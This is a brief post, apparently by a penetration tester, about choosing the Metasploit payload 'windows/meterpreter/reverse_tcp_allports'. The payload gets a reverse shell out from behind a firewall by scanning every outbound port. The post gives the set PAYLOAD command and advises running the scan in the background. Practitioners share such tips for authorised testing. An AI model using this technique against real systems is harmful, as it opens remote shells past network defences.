I found out something quite useful today; if you’re wanting a reverse shell payload within Metasploit with the aim to attack a system behind a firewall, but you don’t know which outbound ports are available to the client, you can use the following payload and a port will be dynamically assigned that is found to be open:
set PAYLOAD windows/meterpreter/reverse_tcp_allports
It may take some time for all 65535 ports to be scanned so you may want to push it to a background job.